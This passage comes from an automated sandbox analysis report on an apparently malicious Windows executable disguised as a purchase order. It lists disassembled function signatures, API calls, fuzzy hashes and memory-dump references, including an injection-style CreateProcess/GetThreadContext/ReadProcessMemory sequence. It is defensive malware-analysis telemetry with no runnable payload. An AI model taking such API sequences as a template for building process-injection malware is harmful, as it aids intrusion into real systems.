                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Temp$FileNamePath
                      • String ID: aut
                      • API String ID: 3285503233-3010740371
                      • Opcode ID: 43fd38e24fa875d5b163945039abc788c68bc0d6768f22619241776558a8edaa
                      • Instruction ID: 03c7e260acc296d56807d2e309b47b7491b85a67890e8c5ceda3bc494f2eca7d
                      • Opcode Fuzzy Hash: 43fd38e24fa875d5b163945039abc788c68bc0d6768f22619241776558a8edaa
                      • Instruction Fuzzy Hash: 49D05EB554030EBBDB10ABA0ED0EF99B7ACA704704F5081907625D20D1D7B4D7458BA0
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 8e4be03c550270df6d294d3e75b78d055ae7c9d8e2d4c1bb1eaf850d61672100
                      • Instruction ID: 8e3f0c71874f3350e180b189b696fb3e37ee64d7ee081cb2311a37e5bfa616d8
                      • Opcode Fuzzy Hash: 8e4be03c550270df6d294d3e75b78d055ae7c9d8e2d4c1bb1eaf850d61672100
                      • Instruction Fuzzy Hash: 74F17B71A047419FCB10DF29C980B5AB7E5FF88314F10896EF9999B292DB31E945CF82
                      APIs
                      • SHGetMalloc.SHELL32(00A93C31), ref: 00A93A7D
                      • SHGetPathFromIDListW.SHELL32(?,?), ref: 00A93AD2
                      • SHGetDesktopFolder.SHELL32(?), ref: 00A93A8F
                        • Part of subcall function 00A93B1E: _wcsncpy.LIBCMT ref: 00A93B32
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: DesktopFolderFromListMallocPath_wcsncpy
                      • String ID:
                      • API String ID: 3981382179-0
                      • Opcode ID: d1b1ac36ab22ccbc9e8abc83987a7c1e8cb6bbe24c272062c2e48b8cd812cd9f
                      • Instruction ID: 8ec6f50b6d5c59241c16c326eb697d4876b1d60b80cd49966096329aa689499e
                      • Opcode Fuzzy Hash: d1b1ac36ab22ccbc9e8abc83987a7c1e8cb6bbe24c272062c2e48b8cd812cd9f
                      • Instruction Fuzzy Hash: 0F213D76B00114ABCF14DB95D884EEEB7BDEF88740B104094F609D7255DB309E46CB90
                      APIs
                      • _memset.LIBCMT ref: 00A935BE
                      • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00A93667
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: IconNotifyShell__memset
                      • String ID:
                      • API String ID: 928536360-0
                      • Opcode ID: 3ff5cdfa5d955af292a538201188e4eb07872fa6b97d38d88815f2ff3910adf7
                      • Instruction ID: 8201c3cd788cab4f08f6be421a83b2bb4dc0683415c66ffe36f5b4e86be5ee18
                      • Opcode Fuzzy Hash: 3ff5cdfa5d955af292a538201188e4eb07872fa6b97d38d88815f2ff3910adf7
                      • Instruction Fuzzy Hash: B4316FB16047019FDB21DF28D845797BBF4FB49309F00096EF69A83341EB71AA48CB52
                      APIs
                      • __FF_MSGBANNER.LIBCMT ref: 00AB4603
                        • Part of subcall function 00AB8E52: __NMSG_WRITE.LIBCMT ref: 00AB8E79
                        • Part of subcall function 00AB8E52: __NMSG_WRITE.LIBCMT ref: 00AB8E83
                      • __NMSG_WRITE.LIBCMT ref: 00AB460A
                        • Part of subcall function 00AB8EB2: GetModuleFileNameW.KERNEL32(00000000,00B50312,00000104,?,00000001,00AB0127), ref: 00AB8F44
                        • Part of subcall function 00AB8EB2: ___crtMessageBoxW.LIBCMT ref: 00AB8FF2
                        • Part of subcall function 00AB1D65: ___crtCorExitProcess.LIBCMT ref: 00AB1D6B
                        • Part of subcall function 00AB1D65: ExitProcess.KERNEL32 ref: 00AB1D74
                        • Part of subcall function 00AB889E: __getptd_noexit.LIBCMT ref: 00AB889E
                      • RtlAllocateHeap.NTDLL(01360000,00000000,00000001,?,?,?,?,00AB0127,?,00A9125D,00000058,?,?), ref: 00AB462F
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                      • String ID:
                      • API String ID: 1372826849-0
                      • Opcode ID: 0ea917289d62d12a5dabd20444b21f7651b0832ecf4f8a3b4db38a71f3ea9706
                      • Instruction ID: eac8716abf4d4309c6ab2df6e4b4260da168b9a757bc5cfd54fccd6b35f061fe
                      • Opcode Fuzzy Hash: 0ea917289d62d12a5dabd20444b21f7651b0832ecf4f8a3b4db38a71f3ea9706
                      • Instruction Fuzzy Hash: 6D01B531601302AAEA203B68AD62BEA735CAF86762F51012AF9059B1C7DFB4DC40C664
                      APIs
                      • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00ADCC71,?,?,?,?,?,00000004), ref: 00ADCFE1
                      • SetFileTime.KERNEL32(00000000,?,00000000,?,?,00ADCC71,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00ADCFF7
                      • CloseHandle.KERNEL32(00000000,?,00ADCC71,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00ADCFFE
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: File$CloseCreateHandleTime
                      • String ID:
                      • API String ID: 3397143404-0
                      • Opcode ID: a3f169e5214a23159bd8f2175c5dad660d12c66262acf672fa1ceae114f99e8a
                      • Instruction ID: 3a20c5b0a52a1f21f69331fa09fa966875c0f732de62b37a5b2d734d20774083
                      • Opcode Fuzzy Hash: a3f169e5214a23159bd8f2175c5dad660d12c66262acf672fa1ceae114f99e8a
                      • Instruction Fuzzy Hash: 7FE08632180214B7D7311B54EC09FCA7B19AB05770F508110FB157A0E0CBB169219798
                      APIs
                        • Part of subcall function 00A916F2: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00A914EB), ref: 00A91751
                      • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00A9159B
                      • CoInitialize.OLE32(00000000), ref: 00A91612
                      • CloseHandle.KERNEL32(00000000), ref: 00B058F7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Handle$CloseInitializeMessageRegisterWindow
                      • String ID:
                      • API String ID: 3815369404-0
                      • Opcode ID: 11fa4746fecb1d81add8d471baf7dbde71289ce772fa59ea038acc0b73c73b06
                      • Instruction ID: e7362d1b0e038d7db0961996ed644dd4fc861b6bc50d30d515befc1f96505c7b
                      • Opcode Fuzzy Hash: 11fa4746fecb1d81add8d471baf7dbde71289ce772fa59ea038acc0b73c73b06
                      • Instruction Fuzzy Hash: 4971BBB59013419BC700EF6EB9A0794BBE4FB5834A794AEEED00A97362DFB04844CF15
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: _memmove
                      • String ID: EA06
                      • API String ID: 4104443479-3962188686
                      • Opcode ID: 44d320149d0307294f6af2e6fd04a246dbf1b3ed233a86c029fc69d5bd14f6f8
                      • Instruction ID: 8d93ff4b8395c7c38853f50952298fa64ba59129ab21ebffbde3bf1b067127a0
                      • Opcode Fuzzy Hash: 44d320149d0307294f6af2e6fd04a246dbf1b3ed233a86c029fc69d5bd14f6f8
                      • Instruction Fuzzy Hash: 65418C31B081549BDF159B6489A1FBF7FF1DB1D300F384665EA829B283C6258D8287A1
                      Strings
                      • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 00B034AA
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: LibraryLoad
                      • String ID: >>>AUTOIT NO CMDEXECUTE<<<
                      • API String ID: 1029625771-2684727018
                      • Opcode ID: 88988c6c67d9ea2364ef06a668828fbe414cb80b342b0fb9ddf725317fb49202
                      • Instruction ID: d2acea4acb70ccea95eb2ee28fadd910ee2f8c3b91aa86220c10fd33370dd6a7
                      • Opcode Fuzzy Hash: 88988c6c67d9ea2364ef06a668828fbe414cb80b342b0fb9ddf725317fb49202
                      • Instruction Fuzzy Hash: 80F06872A0020DAECF11EFB0D9519FFB7FCAE10310F548566E81692192EB349B09CB21
                      APIs
                      • _memmove.LIBCMT ref: 00AB367B
                      • __flush.LIBCMT ref: 00AB369B
                        • Part of subcall function 00AB889E: __getptd_noexit.LIBCMT ref: 00AB889E
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: __flush__getptd_noexit_memmove
                      • String ID:
                      • API String ID: 3662107617-0
                      • Opcode ID: 9e5238af4f93087f8e5510cddb81ebd4f4ffd6b6554c3a66413832ef0355d351
                      • Instruction ID: 8adb749121b1a56387d397d52f579ef00d9ea9f357545473f731e806ff25cf34
                      • Opcode Fuzzy Hash: 9e5238af4f93087f8e5510cddb81ebd4f4ffd6b6554c3a66413832ef0355d351
                      • Instruction Fuzzy Hash: D44192B2600606BFDF18CFA9C8A55EF77ADAB54360B24852DE815C7252EB70DF818B50
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: _memmove
                      • String ID:
                      • API String ID: 4104443479-0
                      • Opcode ID: 133b38695466df121deeaeea8cbe640b9a56e9704eac05184d143640a7114888
                      • Instruction ID: ce3b6c45e4f8ca42ff0c19629eb7a948b4e51617175fdc0ebeccd618a0296d66
                      • Opcode Fuzzy Hash: 133b38695466df121deeaeea8cbe640b9a56e9704eac05184d143640a7114888
                      • Instruction Fuzzy Hash: 5631A2B1710506AFCB04DF69D9D1E69F3E8FF48320754822AE519CB291DB30E820CBA0
                      APIs
                      • IsThemeActive.UXTHEME ref: 00A936E6
                        • Part of subcall function 00AB2025: __lock.LIBCMT ref: 00AB202B
                        • Part of subcall function 00A932DE: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00A932F6
                        • Part of subcall function 00A932DE: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00A9330B
                        • Part of subcall function 00A9374E: GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 00A9376D
                        • Part of subcall function 00A9374E: IsDebuggerPresent.KERNEL32(?,?), ref: 00A9377F
                        • Part of subcall function 00A9374E: GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe,00000104,?,00B51120,C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe,00B51124,?,?), ref: 00A937EE
                        • Part of subcall function 00A9374E: SetCurrentDirectoryW.KERNEL32(?), ref: 00A93860
                      • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00A93726
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
                      • String ID:
                      • API String ID: 924797094-0
                      • Opcode ID: 744c8218554e077f8c5459b257f0d33bd5687251ef84911d0d23abf22310fe6c
                      • Instruction ID: e36677bea15da1c168510c0db27a7e72214a990a2d0d4cea26150ddc9bd0fe9f
                      • Opcode Fuzzy Hash: 744c8218554e077f8c5459b257f0d33bd5687251ef84911d0d23abf22310fe6c
                      • Instruction Fuzzy Hash: F611AC719083419FC700EF29DA09B4EBBF9FB85710F00895EF444872A1DB709A44CB92
                      APIs
                      • ___lock_fhandle.LIBCMT ref: 00ABF7D9
                      • __close_nolock.LIBCMT ref: 00ABF7F2
                        • Part of subcall function 00AB886A: __getptd_noexit.LIBCMT ref: 00AB886A
                        • Part of subcall function 00AB889E: __getptd_noexit.LIBCMT ref: 00AB889E
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                      • String ID:
                      • API String ID: 1046115767-0
                      • Opcode ID: bad7f9c26a3c33ab126974cc6c0944a532f1e23c1a28197f54066af0d153989b
                      • Instruction ID: a826b853a7ee939cf8f1caeebaf779a10fef3772c101d0c110a53d894eaffb16
                      • Opcode Fuzzy Hash: bad7f9c26a3c33ab126974cc6c0944a532f1e23c1a28197f54066af0d153989b
                      • Instruction Fuzzy Hash: 56117C32815A509FD7117FF89E463D87AAC6F42331F6A02A4E5205B1E3CFB85940C7A1
                      APIs
                        • Part of subcall function 00AB45EC: __FF_MSGBANNER.LIBCMT ref: 00AB4603
                        • Part of subcall function 00AB45EC: __NMSG_WRITE.LIBCMT ref: 00AB460A
                        • Part of subcall function 00AB45EC: RtlAllocateHeap.NTDLL(01360000,00000000,00000001,?,?,?,?,00AB0127,?,00A9125D,00000058,?,?), ref: 00AB462F
                      • std::exception::exception.LIBCMT ref: 00AB013E
                      • __CxxThrowException@8.LIBCMT ref: 00AB0153
                        • Part of subcall function 00AB7495: RaiseException.KERNEL32(?,?,00A9125D,00B46598,?,?,?,00AB0158,00A9125D,00B46598,?,00000001), ref: 00AB74E6
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                      • String ID:
                      • API String ID: 3902256705-0
                      • Opcode ID: 519f70b21b7041b8134b4af1afbefeeae0ec92fc75524f8613b99dfd6313c65d
                      • Instruction ID: 81ab5d4c5f32a8f3e8106f86028af34872e81b4d649c45f0525a30782319111f
                      • Opcode Fuzzy Hash: 519f70b21b7041b8134b4af1afbefeeae0ec92fc75524f8613b99dfd6313c65d
                      • Instruction Fuzzy Hash: E1F0C87510421DA6C719FBACED02EDF7BEC9F04350F504556F90596183DBB08A80A7A5
                      APIs
                        • Part of subcall function 00AB889E: __getptd_noexit.LIBCMT ref: 00AB889E
                      • __lock_file.LIBCMT ref: 00AB42B9
                        • Part of subcall function 00AB5A9F: __lock.LIBCMT ref: 00AB5AC2
                      • __fclose_nolock.LIBCMT ref: 00AB42C4
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                      • String ID:
                      • API String ID: 2800547568-0
                      • Opcode ID: 027a6b00d4adba6d60c4de9df9df228556deb6994a83ce347c0768d63b609c80
                      • Instruction ID: 075acd37466d43119495b0c23004991a69f874f3cd19e1d6434bc75c533fb873
                      • Opcode Fuzzy Hash: 027a6b00d4adba6d60c4de9df9df228556deb6994a83ce347c0768d63b609c80
                      • Instruction Fuzzy Hash: 4CF0E931D017549ADB10BB7589027DE7BECAF85334F218209F824AB1C3CBBC8941AF51
                      APIs
                      • CreateProcessW.KERNEL32(?,00000000), ref: 013BB9F3
                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 013BBA89
                      • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 013BBAAB
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051465036.00000000013B9000.00000040.00000020.00020000.00000000.sdmp, Offset: 013B9000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_13b9000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                      • String ID:
                      • API String ID: 2438371351-0
                      • Opcode ID: c7490eb0849e98549b11c4fe0459da6d53c4872c769bbd933b9fbf1e0076ab14
                      • Instruction ID: aa1fbaad2d43d63bac2dde9d71064c2ec37d0f15a978097d2467e5a12a340400
                      • Opcode Fuzzy Hash: c7490eb0849e98549b11c4fe0459da6d53c4872c769bbd933b9fbf1e0076ab14
                      • Instruction Fuzzy Hash: 2E12BE24E18658C6EB24DF64D8507DEB232EF68300F1094E9910DEB7A5E77A4F81CF5A
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: ProtectVirtual
                      • String ID:
                      • API String ID: 544645111-0
                      • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                      • Instruction ID: a9b5a818cbf73ec010a63d7029733e49233c0247e94bc461045fff11e23793c4
                      • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                      • Instruction Fuzzy Hash: CB31C670A00106AFD758DF98D480A6AFBB5FF4A350B2486A5E449CB295D731EDC1CBD0
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: _memmove
                      • String ID:
                      • API String ID: 4104443479-0
                      • Opcode ID: 88aa2d63378c1f750c56ac4746b34edf58f8b70712c1849dd2e966d4e116ad12
                      • Instruction ID: 62bb2c6bfcc4543eb6c7c78014972d0f4c3571fe76f8448698ee15e55a15002a
                      • Opcode Fuzzy Hash: 88aa2d63378c1f750c56ac4746b34edf58f8b70712c1849dd2e966d4e116ad12
                      • Instruction Fuzzy Hash: 2B210071610608EBDF148F24EC45769BFF8FB25380F2184AEE48AC60A0EF3089D4D721
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: _memmove
                      • String ID:
                      • API String ID: 4104443479-0
                      • Opcode ID: dfab3c914ab5a01d594dc6e42d7d2bdcd10fc43f0987cc32999be8bc3fb1e6db
